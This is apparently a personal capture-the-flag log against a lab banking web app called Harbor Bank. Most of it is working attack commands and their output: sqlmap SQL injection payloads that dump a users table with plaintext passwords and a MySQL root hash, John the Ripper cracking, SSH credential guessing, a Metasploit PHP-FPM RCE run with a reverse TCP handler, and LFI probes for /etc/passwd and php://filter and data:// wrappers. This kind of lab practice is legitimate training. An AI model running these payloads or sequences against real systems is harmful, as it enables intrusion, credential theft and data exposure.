[21:28:06] [INFO] resumed: 'root'
[21:28:06] [INFO] retrieved: '*F20B31125A91203904A57F21129CD8972CDE7FD3'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[21:28:12] [INFO] writing hashes to a temporary file '/tmp/sqlmapnu3_ogz05511/sqlmaphashes-wmts93gw.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[21:28:16] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:28:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[21:28:28] [INFO] starting dictionary-based cracking (mysql_passwd)
[21:28:28] [INFO] starting 2 processes 
[21:28:45] [WARNING] no clear password(s) found                                                                                                                        
database management system users password hashes:
[*] root [1]:
    password hash: *F20B31125A91203904A57F21129CD8972CDE7FD3

[21:28:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.24'

[*] ending @ 21:28:45 /2020-04-16/


--------------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ echo root:*F20B31125A91203904A57F21129CD8972CDE7FD3 > Mysql-pwd-to-crack.txt

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo john  Mysql-pwd-to-crack.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
 Warning: Only 1 candidate left, minimum 8 needed for performance.
0g 0:00:00:51 DONE (2020-04-16 21:49) 0g/s 4542Kp/s 4542Kc/s 4542KC/s Aaaaaaaaaaaaing
Session completed

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo john  Mysql-pwd-to-crack.txt --show
0 password hashes cracked, 1 left

--------------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo sqlmap --current-db --tables --dbms="MySQL" -r SQLi-Transfer-request-burp 
        ___
       __H__                                                                                                                                                            
 ___ ___[.]_____ ___ ___  {1.4.3#stable}                                                                                                                                
|_ -| . [(]     | .'| . |                                                                                                                                               
|___|_  [(]_|_|_|__,|  _|                                                                                                                                               
      |_|V...       |_|   http://sqlmap.org     

<SNIP>

Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS                                     |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMN_PRIVILEGES                                  |
| ENGINES                                            |
| EVENTS                                             |
| FILES                                              |
| GLOBAL_STATUS                                      |
| GLOBAL_VARIABLES                                   |
| INNODB_BUFFER_PAGE                                 |
| INNODB_BUFFER_PAGE_LRU                             |
| INNODB_BUFFER_POOL_STATS                           |
| INNODB_CMP                                         |
| INNODB_CMPMEM                                      |
| INNODB_CMPMEM_RESET                                |
| INNODB_CMP_PER_INDEX                               |
| INNODB_CMP_PER_INDEX_RESET                         |
| INNODB_CMP_RESET                                   |
| INNODB_FT_BEING_DELETED                            |
| INNODB_FT_CONFIG                                   |
| INNODB_FT_DEFAULT_STOPWORD                         |
| INNODB_FT_DELETED                                  |
| INNODB_FT_INDEX_CACHE                              |
| INNODB_FT_INDEX_TABLE                              |
| INNODB_LOCKS                                       |
| INNODB_LOCK_WAITS                                  |
| INNODB_METRICS                                     |
| INNODB_SYS_COLUMNS                                 |
| INNODB_SYS_DATAFILES                               |
| INNODB_SYS_FIELDS                                  |
| INNODB_SYS_FOREIGN                                 |
| INNODB_SYS_FOREIGN_COLS                            |
| INNODB_SYS_INDEXES                                 |
| INNODB_SYS_TABLES                                  |
| INNODB_SYS_TABLESPACES                             |
| INNODB_SYS_TABLESTATS                              |
| INNODB_TRX                                         |
| KEY_COLUMN_USAGE                                   |
| OPTIMIZER_TRACE                                    |
| PARAMETERS                                         |
| PARTITIONS                                         |
| PLUGINS                                            |
| PROCESSLIST                                        |
| PROFILING                                          |
| REFERENTIAL_CONSTRAINTS                            |
| ROUTINES                                           |
| SCHEMATA                                           |
| SCHEMA_PRIVILEGES                                  |
| SESSION_STATUS                                     |
| SESSION_VARIABLES                                  |
| TABLESPACES                                        |
| TABLE_CONSTRAINTS                                  |
| TABLE_PRIVILEGES                                   |
| TRIGGERS                                           |
| USER_PRIVILEGES                                    |
| VIEWS                                              |
| COLUMNS                                            |
| STATISTICS                                         |
| TABLES                                             |
+----------------------------------------------------+

Database: HarborBankUsers
[1 table]
+----------------------------------------------------+
| users                                              |
+----------------------------------------------------+

Database: mysql
[28 tables]
+----------------------------------------------------+
| db                                                 |
| event                                              |
| user                                               |
| columns_priv                                       |
| func                                               |
| general_log                                        |
| help_category                                      |
| help_keyword                                       |
| help_relation                                      |
| help_topic                                         |
| innodb_index_stats                                 |
| innodb_table_stats                                 |
| ndb_binlog_index                                   |
| plugin                                             |
| proc                                               |
| procs_priv                                         |
| proxies_priv                                       |
| servers                                            |
| slave_master_info                                  |
| slave_relay_log_info                               |
| slave_worker_info                                  |
| slow_log                                           |
| tables_priv                                        |
| time_zone                                          |
| time_zone_leap_second                              |
| time_zone_name                                     |
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+

Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
| events_stages_history                              |
| events_stages_history_long                         |
| events_stages_summary_by_account_by_event_name     |
| events_stages_summary_by_host_by_event_name        |
| events_stages_summary_by_thread_by_event_name      |
| events_stages_summary_by_user_by_event_name        |
| events_stages_summary_global_by_event_name         |
| events_statements_current                          |
| events_statements_history                          |
| events_statements_history_long                     |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest                |
| events_statements_summary_by_host_by_event_name    |
| events_statements_summary_by_thread_by_event_name  |
| events_statements_summary_by_user_by_event_name    |
| events_statements_summary_global_by_event_name     |
| events_waits_current                               |
| events_waits_history                               |
| events_waits_history_long                          |
| events_waits_summary_by_account_by_event_name      |
| events_waits_summary_by_host_by_event_name         |
| events_waits_summary_by_instance                   |
| events_waits_summary_by_thread_by_event_name       |
| events_waits_summary_by_user_by_event_name         |
| events_waits_summary_global_by_event_name          |
| file_instances                                     |
| file_summary_by_event_name                         |
| file_summary_by_instance                           |
| host_cache                                         |
| hosts                                              |
| mutex_instances                                    |
| objects_summary_global_by_type                     |
| performance_timers                                 |
| rwlock_instances                                   |
| session_account_connect_attrs                      |
| session_connect_attrs                              |
| setup_actors                                       |
| setup_consumers                                    |
| setup_instruments                                  |
| setup_objects                                      |
| setup_timers                                       |
| socket_instances                                   |
| socket_summary_by_event_name                       |
| socket_summary_by_instance                         |
| table_io_waits_summary_by_index_usage              |
| table_io_waits_summary_by_table                    |
| table_lock_waits_summary_by_table                  |
| threads                                            |
| users                                              |
+----------------------------------------------------+

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo sqlmap --dump -D HarborBankUsers -T users --columns --dbms="MySQL" -r SQLi-Transfer-request-burp                                                             
        ___                                                                                                                                                                                              
       __H__                                                                                                                                                                                             
 ___ ___[(]_____ ___ ___  {1.4.3#stable}                                                                                                                                                                 
|_ -| . [)]     | .'| . |                                                                                                                                                                                
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                              

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:35:44 /2020-04-16/

[21:35:44] [INFO] parsing HTTP request from 'SQLi-Transfer-request-burp'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[21:35:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: recipient=admin' AND 7337=(SELECT (CASE WHEN (7337=7337) THEN 7337 ELSE (SELECT 4342 UNION SELECT 5555) END))-- -&amount=0.00001&x=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: recipient=admin' AND (SELECT 8462 FROM(SELECT COUNT(*),CONCAT(0x71766b7671,(SELECT (ELT(8462=8462,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- coRV&amount=0.00001&x=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: recipient=admin' AND (SELECT 4847 FROM (SELECT(SLEEP(5)))kWRe)-- nzMi&amount=0.00001&x=Submit
---
[21:35:46] [INFO] testing MySQL
[21:35:46] [INFO] confirming MySQL
[21:35:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[21:35:46] [INFO] fetching columns for table 'users' in database 'HarborBankUsers'
[21:35:46] [INFO] retrieved: 'id'
[21:35:46] [INFO] retrieved: 'int(11)'
[21:35:46] [INFO] retrieved: 'username'
[21:35:46] [INFO] retrieved: 'text'
[21:35:46] [INFO] retrieved: 'password'
[21:35:46] [INFO] retrieved: 'text'
[21:35:46] [INFO] retrieved: 'balance'
[21:35:46] [INFO] retrieved: 'decimal(13,2)'
Database: HarborBankUsers
Table: users
[4 columns]
+----------+---------------+
| Column   | Type          |
+----------+---------------+
| id       | int(11)       |
| password | text          |
| balance  | decimal(13,2) |
| username | text          |
+----------+---------------+

[21:35:46] [INFO] fetching columns for table 'users' in database 'HarborBankUsers'
[21:35:46] [INFO] resumed: 'id'
[21:35:46] [INFO] resumed: 'int(11)'
[21:35:46] [INFO] resumed: 'username'
[21:35:46] [INFO] resumed: 'text'
[21:35:46] [INFO] resumed: 'password'
[21:35:46] [INFO] resumed: 'text'
[21:35:46] [INFO] resumed: 'balance'
[21:35:46] [INFO] resumed: 'decimal(13,2)'
[21:35:46] [INFO] fetching entries for table 'users' in database 'HarborBankUsers'
[21:35:46] [INFO] retrieved: '6'
[21:35:46] [INFO] retrieved: 'yHNJ4Nm@HaVU-=XQ'
[21:35:46] [INFO] retrieved: '0.03'
[21:35:46] [INFO] retrieved: 'Admin'
[21:35:46] [INFO] retrieved: '7'
[21:35:46] [INFO] retrieved: 'e_PLJ3cyVEVnxY7'
[21:35:46] [INFO] retrieved: '0.03'
[21:35:46] [INFO] retrieved: 'Bill'
[21:35:46] [INFO] retrieved: '8'
[21:35:46] [INFO] retrieved: 'z_&=_KwMM*3D7AzC'
[21:35:46] [INFO] retrieved: '0.03'
[21:35:46] [INFO] retrieved: 'Steve'
[21:35:46] [INFO] retrieved: '9'
[21:35:46] [INFO] retrieved: '^&3JneRScU*Tt4-v'
[21:35:46] [INFO] retrieved: '0.03'
[21:35:46] [INFO] retrieved: 'Jill'
[21:35:46] [INFO] retrieved: '10'
[21:35:47] [INFO] retrieved: '$hBW!!NL52azb+HY'
[21:35:47] [INFO] retrieved: '0.03'
[21:35:47] [INFO] retrieved: 'Timothy'
[21:35:47] [INFO] retrieved: '11'
[21:35:47] [INFO] retrieved: 'mvTvt3u-9CeVB@26'
[21:35:47] [INFO] retrieved: '0.03'
[21:35:47] [INFO] retrieved: 'Quinten'
Database: HarborBankUsers
Table: users
[6 entries]
+------+---------+----------+------------------+
| id   | balance | username | password         |
+------+---------+----------+------------------+
| 6    | 0.03    | Admin    | yHNJ4Nm@HaVU-=XQ |
| 7    | 0.03    | Bill     | e_PLJ3cyVEVnxY7  |
| 8    | 0.03    | Steve    | z_&=_KwMM*3D7AzC |
| 9    | 0.03    | Jill     | ^&3JneRScU*Tt4-v |
| 10   | 0.03    | Timothy  | $hBW!!NL52azb+HY |
| 11   | 0.03    | Quinten  | mvTvt3u-9CeVB@26 |
+------+---------+----------+------------------+

[21:35:47] [INFO] table 'HarborBankUsers.users' dumped to CSV file '/root/.sqlmap/output/192.168.1.24/dump/HarborBankUsers/users.csv'
[21:35:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.24'

[*] ending @ 21:35:47 /2020-04-16/

-------------------------------------------------------------------------------------------

=> attempts to log into the SSH server with these credentials... It failed...

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh admin@192.168.1.24
The authenticity of host '192.168.1.24 (192.168.1.24)' can't be established.
ECDSA key fingerprint is SHA256:SNsYqA7M2sHKn8eL0/lr67tvMpH68ns6o4/mWrhgKDI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.24' (ECDSA) to the list of known hosts.
admin@192.168.1.24's password: 
Permission denied, please try again.
admin@192.168.1.24's password: 
Permission denied, please try again.
admin@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh root@192.168.1.24
root@192.168.1.24's password: 
Permission denied, please try again.
root@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh bill@192.168.1.24
bill@192.168.1.24's password: 
Permission denied, please try again.
bill@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ^C
jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh steve@192.168.1.24
steve@192.168.1.24's password: 
Permission denied, please try again.
steve@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh jill@192.1681.1.24
ssh: Could not resolve hostname 192.1681.1.24: Name or service not known
jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh jill@192.168.1.24
jill@192.168.1.24's password: 
Permission denied, please try again.
jill@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh timothy@192.168.1.24
timothy@192.168.1.24's password: 
Permission denied, please try again.
timothy@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh quinten@192.168.1.24
quinten@192.168.1.24's password: 
Permission denied, please try again.
quinten@192.168.1.24's password: 

jeff@kali:~/Documents/CTFs/SafeHarbor$ ssh root@192.168.1.24
root@192.168.1.24's password: 
Permission denied, please try again.
root@192.168.1.24's password: 
Permission denied, please try again.
root@192.168.1.24's password: 
root@192.168.1.24: Permission denied (publickey,password).

-------------------------------------------------------------------------------------------

PHP-FPM Underflow RCE - https://www.rapid7.com/db/modules/exploit/multi/http/php_fpm_rce

msf5 > use exploit/multi/http/php_fpm_rce
msf5 exploit(multi/http/php_fpm_rce) > options

Module options (exploit/multi/http/php_fpm_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /index.php       yes       Path to a PHP page
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PHP


msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.1.24
RHOSTS => 192.168.1.24
msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /login.php
TARGETURI => /login.php
msf5 exploit(multi/http/php_fpm_rce) > run

[*] Started reverse TCP handler on 192.168.1.22:4444 
[*] Sending baseline query...
[*] Detecting QSL...
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /phpinfo.php
TARGETURI => /phpinfo.php
msf5 exploit(multi/http/php_fpm_rce) > run

[*] Started reverse TCP handler on 192.168.1.22:4444 
[*] Sending baseline query...
[*] Detecting QSL...
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/php_fpm_rce) > 


-------------------------------------------------------------------------------------------

<!DOCTYPE html>
<html lang="en">
<!-- Harbor Bank Online v2 - See changelog.txt for version details.-->
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
    <style type="text/css">
	html, body { height: 100%;}
	html { display: table; margin: auto; }
        body{ font: 14px sans-serif; display: table-cell; vertical-align: middle; }
	.wrapper{ width: 350px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper" align="center">
        <h2>Online Banking Login</h2>
        <p>Enter Credentials for Harbor Bank Login:</p>
        <form action="" method="post">
            <div class="form-group " align="center">
                <label>Username</label>
                <input type="text" name="user" class="form-control" value="">
                <span class="help-block"></span>
            </div>    
            <div class="form-group " align="center">
                <label>Password</label>
                <input type="password" name="password" class="form-control">
                <span class="help-block"></span>
            </div>
            <div class="form-group" align="center">
                <input type="submit" class="btn btn-primary" value="Login" name="s">
            </div>
        </form>
    </div>    
</body>
</html>



=====================================================================================

http://192.168.1.24/changelog.txt

Version 1: Initial commit of application for compose stack.

Version 2: Numerous security issues with web app resolved. Spin down of vulnerable versions is
scheduled for next maintenance window, will be done slowly to prevent customer impact.


bill
admin
jill
quinten
timothy
steve
quinten

======================================================================================
Local file include 
======================================================================================

Interesting Informtaion
------------------------
=> http://192.168.1.36/phpinfo.php

Core
PHP Version 	7.2.7

Directive		Local Value	Master Value
-----------------------------------------------------
allow_url_fopen		On		On		=> potential RFI
allow_url_include	On		On		=> potential RFI
<snip>
open_basedir		no value	no value	=> potnetial LFI




Useful sources regarding LFI and RFI
-------------------------------------
+ https://github.com/qazbnm456/awesome-security-trivia/blob/master/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md
+ https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-data
+ https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/


Tools to test
--------------
    Kadimus - https://github.com/P0cL4bs/Kadimus
    LFISuite - https://github.com/D35m0nd142/LFISuite
    fimap - https://github.com/kurobeats/fimap



LFI Test
=========

+ http://192.168.1.24/OnlineBanking/index.php?p=welcome.php

=> Error message
Include(welcome.php.php): failed to open stream: No such file or directory in /var/www/html/OnlineBanking/index.php on line 13
Warning: include(): Failed opening 'welcome.php.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/OnlineBanking/index.php on line 13

=> Works
+ http://192.168.1.24/OnlineBanking/index.php?p=/var/www/html/OnlineBanking/welcome

+ http://192.168.1.36/OnlineBanking/index.php?p=/../../../../../../../var/www/html/OnlineBanking/welcome


Kadimus - https://github.com/ccavxx/Kadimus
---------------------------------------------
wget https://github.com/ccavxx/Kadimus/archive/master.zip 
sudo apt-get install libcurl4-openssl-dev
sudo apt-get install libpcre3-dev
sudo apt-get install libssh-dev
cd Kadimus-master
sudo ./configure
sudo make


jeff@kali:~/Documents/CTFs/SafeHarbor/Kadimus-master$ sudo ./kadimus --cookie PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9 --url http://192.168.1.36/OnlineBanking/index.php?p=welcome --proxy http://127.0.0.1:8080
 _  __         _ _                     
| |/ /__ _  __| (_)_ __ ___  _   _ ___ 
| ' // _` |/ _` | | '_ ` _ \| | | / __|
| . \ (_| | (_| | | | | | | | |_| \__ \
|_|\_\__,_|\__,_|_|_| |_| |_|\__,_|___/

  v1.1 - LFI Scan & Exploit Tool (@hc0d3r - P0cL4bs Team)

[+] http://192.168.1.36/OnlineBanking/index.php?p=welcome

[*] Testing if URI have dynamic content
[~] URI dont have dynamic content

[CHECKING] parameter: p

[*] Checking Commom Errors
[~] http://192.168.1.36/OnlineBanking/index.php?p=OU83vRwYOurhJSt6aUx
[-] No errors Found

[*] Source Disclosure Test
[~] Target probably vulnerable

        0x0000:  3c3f 7068 700a 7365 7373 696f 6e5f 7374  <?php.session_st
        0x0010:  6172 7428 293b 0a0a 6966 2869 735f 6e75  art();..if(is_nu
        0x0020:  6c6c 2824 5f53 4553 5349 4f4e 5b22 6c6f  ll($_SESSION["lo
        0x0030:  6767 6564 696e 225d 2929 7b0a 0968 6561  ggedin"])){..hea
        0x0040:  6465 7228 224c 6f63 6174 696f 6e3a 202f  der("Location:./
        0x0050:  2229 3b0a 7d0a 0a3f 3e0a 0a0a 3c21 444f  ");.}..?>...<!DO
        0x0060:  4354 5950 4520 6874 6d6c 3e0a 3c68 746d  CTYPE.html>.<htm
        0x0070:  6c20 6c61 6e67 3d22 656e 223e 0a3c 6865  l.lang="en">.<he
        0x0080:  6164 3e0a 2020 2020 3c6d 6574 6120 6368  ad>.....<meta.ch
        0x0090:  6172 7365 743d 2255 5446 2d38 223e 0a20  arset="UTF-8">..
        0x0100:  2020 203c 7469 746c 653e 4861 7262 6f72  ...<title>Harbor
        0x0110:  2042 616e 6b20 4f6e 6c69 6e65 3c2f 7469  .Bank.Online</ti
        0x0120:  746c 653e 0a20 2020 203c 6c69 6e6b 2072  tle>.....<link.r
        0x0130:  656c 3d22 7374 796c 6573 6865 6574 2220  el="stylesheet".
        0x0140:  6872 6566 3d22 6874 7470 733a 2f2f 6d61  href="https://ma
        0x0150:  7863 646e 2e62 6f6f 7473 7472 6170 6364  xcdn.bootstrapcd
        0x0160:  6e2e 636f 6d2f 626f 6f74 7374 7261 702f  n.com/bootstrap/
        0x0170:  332e 332e 372f 6373 732f 626f 6f74 7374  3.3.7/css/bootst
        0x0180:  7261 702e 6373 7322 3e0a 2020 2020 3c73  rap.css">.....<s
        0x0190:  7479 6c65 2074 7970 653d 2274 6578 742f  tyle.type="text/
        0x0200:  6373 7322 3e0a 2020 2020 2020 2020 626f  css">.........bo
        0x0210:  6479 7b20 666f 6e74 3a20 3134 7078 2073  dy{.font:.14px.s
        0x0220:  616e 732d 7365 7269 663b 207d 0a20 2020  ans-serif;.}....
        0x0230:  2020 2020 202e 7772 6170 7065 727b 2077  ......wrapper{.w
        0x0240:  6964 7468 3a20 3335 3070 783b 2070 6164  idth:.350px;.pad
        0x0250:  6469 6e67 3a20 3230 7078 3b20 7d0a 2020  ding:.20px;.}...
        0x0260:  2020 3c2f 7374 796c 653e 0a3c 2f68 6561  ..</style>.</hea
        0x0270:  643e 0a3c 626f 6479 3e0a 3c68 313e 4861  d>.<body>.<h1>Ha
        0x0280:  7262 6f72 2042 616e 6b20 4f6e 6c69 6e65  rbor.Bank.Online
        0x0290:  3c2f 6831 3e0a 3c6e 6176 2063 6c61 7373  </h1>.<nav.class
        0x0300:  3d22 6e61 7662 6172 206e 6176 6261 722d  ="navbar.navbar-
        0x0310:  6465 6661 756c 7422 3e0a 2020 3c64 6976  default">...<div
        0x0320:  2063 6c61 7373 3d22 636f 6e74 6169 6e65  .class="containe
        0x0330:  722d 666c 7569 6422 3e0a 2020 2020 3c64  r-fluid">.....<d
        0x0340:  6976 2063 6c61 7373 3d22 6e61 7662 6172  iv.class="navbar
        0x0350:  2d68 6561 6465 7222 3e0a 2020 2020 2020  -header">.......
        0x0360:  3c61 2063 6c61 7373 3d22 6e61 7662 6172  <a.class="navbar
        0x0370:  2d62 7261 6e64 2220 6872 6566 3d22 2322  -brand".href="#"
        0x0380:  3e3c 2f61 3e0a 2020 2020 3c2f 6469 763e  ></a>.....</div>
        0x0390:  0a20 2020 203c 756c 2063 6c61 7373 3d22  .....<ul.class="
        0x0400:  6e61 7620 6e61 7662 6172 2d6e 6176 223e  nav.navbar-nav">
        0x0410:  0a20 2020 2020 203c 6c69 2063 6c61 7373  .......<li.class
        0x0420:  3d22 6163 7469 7665 223e 3c61 2068 7265  ="active"><a.hre
        0x0430:  663d 2223 223e 486f 6d65 3c2f 613e 3c2f  f="#">Home</a></
        0x0440:  6c69 3e0a 2020 2020 2020 3c6c 693e 3c61  li>.......<li><a
        0x0450:  2068 7265 663d 2269 6e64 6578 2e70 6870  .href="index.php
        0x0460:  3f70 3d62 616c 616e 6365 223e 4261 6c61  ?p=balance">Bala
        0x0470:  6e63 653c 2f61 3e3c 2f6c 693e 0a20 2020  nce</a></li>....
        0x0480:  2020 203c 6c69 3e3c 6120 6872 6566 3d22  ...<li><a.href="
        0x0490:  696e 6465 782e 7068 703f 703d 7472 616e  index.php?p=tran
        0x0500:  7366 6572 223e 5472 616e 7366 6572 733c  sfer">Transfers<
        0x0510:  2f61 3e3c 2f6c 693e 0a20 2020 2020 203c  /a></li>.......<
        0x0520:  6c69 3e3c 6120 6872 6566 3d22 696e 6465  li><a.href="inde
        0x0530:  782e 7068 703f 703d 6163 636f 756e 7422  x.php?p=account"
        0x0540:  3e4d 7920 4163 636f 756e 743c 2f61 3e3c  >My.Account</a><
        0x0550:  2f6c 693e 0a20 2020 2020 203c 6c69 3e3c  /li>.......<li><
        0x0560:  6120 6872 6566 3d22 696e 6465 782e 7068  a.href="index.ph
        0x0570:  703f 703d 6162 6f75 7422 3e41 626f 7574  p?p=about">About
        0x0580:  3c2f 613e 3c2f 6c69 3e0a 2020 2020 2020  </a></li>.......
        0x0590:  3c6c 693e 3c61 2068 7265 663d 2269 6e64  <li><a.href="ind
        0x0600:  6578 2e70 6870 3f70 3d6c 6f67 6f75 7422  ex.php?p=logout"
        0x0610:  206f 6e63 6c69 636b 3d22 636f 6e66 6972  .onclick="confir
        0x0620:  6d28 2741 7265 2079 6f75 2073 7572 6520  m('Are.you.sure.
        0x0630:  796f 7520 7761 6e74 2074 6f20 6c6f 6720  you.want.to.log.
        0x0640:  6f75 743f 2729 223e 4c6f 6720 4f75 743c  out?')">Log.Out<
        0x0650:  2f61 3e3c 2f6c 693e 0a20 2020 203c 2f75  /a></li>.....</u
        0x0660:  6c3e 0a20 203c 2f64 6976 3e0a 3c2f 6e61  l>...</div>.</na
        0x0670:  763e 0a3c 6469 7620 616c 6967 6e3d 2263  v>.<div.align="c
        0x0680:  656e 7465 7222 3e0a 3c68 343e 5765 6c63  enter">.<h4>Welc
        0x0690:  6f6d 652c 203c 3f70 6870 2065 6368 6f20  ome,.<?php.echo.
        0x0700:  245f 5345 5353 494f 4e5b 2275 7365 726e  $_SESSION["usern
        0x0710:  616d 6522 5d3b 203f 3e2e 3c2f 6834 3e0a  ame"];.?>.</h4>.
        0x0720:  3c62 6f64 793e 5573 6520 7468 6520 6d65  <body>Use.the.me
        0x0730:  6e75 2061 626f 7665 2074 6f20 7065 7266  nu.above.to.perf
        0x0740:  6f72 6d20 796f 7572 206f 6e6c 696e 6520  orm.your.online.
        0x0750:  6261 6e6b 696e 672e 3c2f 626f 6479 3e0a  banking.</body>.
        0x0760:  3c2f 6469 763e                           </div>

[*] Checking Files
[~] Ok

[*] RCE Scan

[+] php://input Tests
[-] probably not vulnerable
[*] php://input test finish

[+] /proc/self/environ tests
[-] probably not vulnerable
[*] /proc/self/environ test finish

[+] data wrap test
[-] probably not vulnerable
[*] data wrap test finish

[+] /var/log/auth.log tests
[-] probably not vulnerable
[*] /var/log/auth.log test finish

[~] Ok

[~] Single scan finish !!!

-----------------------------------------------------
Request sent by Kadimus that went through my Burp
-----------------------------------------------------
http://192.168.1.36/OnlineBanking/index.php?p=welcome
http://192.168.1.36/OnlineBanking/index.php?p=welcome
http://192.168.1.36/OnlineBanking/index.php?p=OU83vRwYOurhJSt6aUx
http://192.168.1.36/OnlineBanking/index.php?p=welcome
http://192.168.1.36/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=welcome
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../../etc/passwd%00
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../../etc/passwd
http://192.168.1.36/OnlineBanking/index.php?p=/etc/passwd
http://192.168.1.36/OnlineBanking/index.php?p=/etc/passwd%00
http://192.168.1.36/OnlineBanking/index.php?p=php://input
http://192.168.1.36/OnlineBanking/index.php?p=php://input%00
http://192.168.1.36/OnlineBanking/index.php?p=/proc/self/environ
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../proc/self/environ
http://192.168.1.36/OnlineBanking/index.php?p=/proc/self/environ%00
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../proc/self/environ%00
http://192.168.1.36/OnlineBanking/index.php?p=data://text/plain;base64,T1U4M3ZSd1lPdXJoSlN0NmFVeDw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPk9VODN2UndZT3VyaEpTdDZhVXg%3D
http://192.168.1.36/OnlineBanking/index.php?p=/var/log/auth.log
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../var/log/auth.log
http://192.168.1.36/OnlineBanking/index.php?p=/var/log/auth.log%00
http://192.168.1.36/OnlineBanking/index.php?p=../../../../../../../../../../../var/log/auth.log%00

-----------------------------------------------------

GET /OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=welcome HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Connection: close


HTTP/1.1 200 OK
Server: nginx/1.17.4
Date: Wed, 22 Apr 2020 22:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1632

PD9waHAKc2Vzc2lvbl9zdGFydCgpOwoKaWYoaXNfbnVsbCgkX1NFU1NJT05bImxvZ2dlZGluIl0pKXsKCWhlYWR<SNIP>


BURP Base64 decoder
-------------------


<?php
session_start();

if(is_null($_SESSION["loggedin"])){
	header("Location: /");
}

?>


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Harbor Bank Online</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
